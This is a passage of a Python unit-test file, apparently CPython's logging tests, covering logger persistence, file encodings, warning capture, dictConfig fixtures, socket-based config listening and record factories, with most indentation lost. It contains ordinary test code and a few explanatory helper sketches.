self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
        self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
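# Illustrative sketch (not part of the test suite): the behaviour MemoryTest
# relies on.  The logging Manager keeps a reference to every logger it
# creates, so getLogger() with the same name always returns the same, still
# configured object even after all user references are dropped.
def _logger_persistence_sketch():
    first = logging.getLogger('persistence.sketch')
    first.setLevel(logging.DEBUG)
    del first
    return logging.getLogger('persistence.sketch').level == logging.DEBUG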
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
        # A FileHandler opened with an explicit encoding should round-trip
        # non-ASCII data.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
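# Illustrative sketch (not part of the test suite): captureWarnings(True)
# replaces warnings.showwarning with a hook that formats each warning and
# logs it through the 'py.warnings' logger at WARNING level, which is what
# the tests above intercept with a StreamHandler.
def _capture_warnings_sketch():
    import io, warnings
    stream = io.StringIO()
    handler = logging.StreamHandler(stream)
    logging.captureWarnings(True)
    try:
        logger = logging.getLogger('py.warnings')
        logger.addHandler(handler)
        with warnings.catch_warnings():
            warnings.simplefilter('always')
            warnings.warn('redirected to logging')
        logger.removeHandler(handler)
    finally:
        logging.captureWarnings(False)
    return stream.getvalue()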
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
    # config7 does not define compiler.parser but defines compiler.lexer,
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    # Same as test_config7_ok, but without disabling existing loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
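# Illustrative sketch (not part of the test suite): the two reference
# syntaxes the dict-based configs above rely on.  'ext://' names an
# importable external object (e.g. ext://sys.stdout), while 'cfg://' points
# back into the configuration dictionary itself, as config11 does with its
# 'true_formatters' and 'handler_configs' sections.
def _dictconfig_references_sketch():
    logging.config.dictConfig({
        'version': 1,
        'shared': {
            'fmt': {'format': '%(levelname)s ++ %(message)s'},
        },
        'formatters': 'cfg://shared',          # reuse the dict defined above
        'handlers': {
            'hand1': {
                'class': 'logging.StreamHandler',
                'formatter': 'fmt',
                'stream': 'ext://sys.stdout',  # resolved via import
            },
        },
        'root': {'level': 'WARNING', 'handlers': ['hand1']},
    })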
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
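# Illustrative sketch (not part of the test suite): logging.setLoggerClass()
# is the module-level counterpart of Manager.setLoggerClass() used above --
# loggers created afterwards are instances of the registered subclass.
def _logger_class_sketch():
    class VerboseLogger(logging.Logger):
        pass
    old_class = logging.getLoggerClass()
    logging.setLoggerClass(VerboseLogger)
    try:
        return isinstance(logging.getLogger('sketch.verbose'), VerboseLogger)
    finally:
        logging.setLoggerClass(old_class)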
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
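# Illustrative sketch (not part of the test suite): getChild() just joins
# names with a dot, so it returns the identical logger object that
# getLogger() would return for the suffixed name.
def _get_child_sketch():
    parent = logging.getLogger('sketch.parent')
    return parent.getChild('leaf') is logging.getLogger('sketch.parent.leaf')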
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
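# Illustrative sketch (not part of the test suite): setLogRecordFactory()
# swaps the callable used to create every LogRecord, which is how the test
# above arranges for DerivedLogRecord instances to reach its filter.  A
# factory can also wrap the old one to enrich records.
def _record_factory_sketch():
    old_factory = logging.getLogRecordFactory()
    def factory(*args, **kwargs):
        record = old_factory(*args, **kwargs)
        record.custom_attribute = 'extra'  # stamped onto every record
        return record
    logging.setLogRecordFactory(factory)
    try:
        record = logging.getLogRecordFactory()('demo', logging.INFO,
                                               __file__, 1, 'msg', None, None)
        return record.custom_attribute
    finally:
        logging.setLogRecordFactory(old_factory)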
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
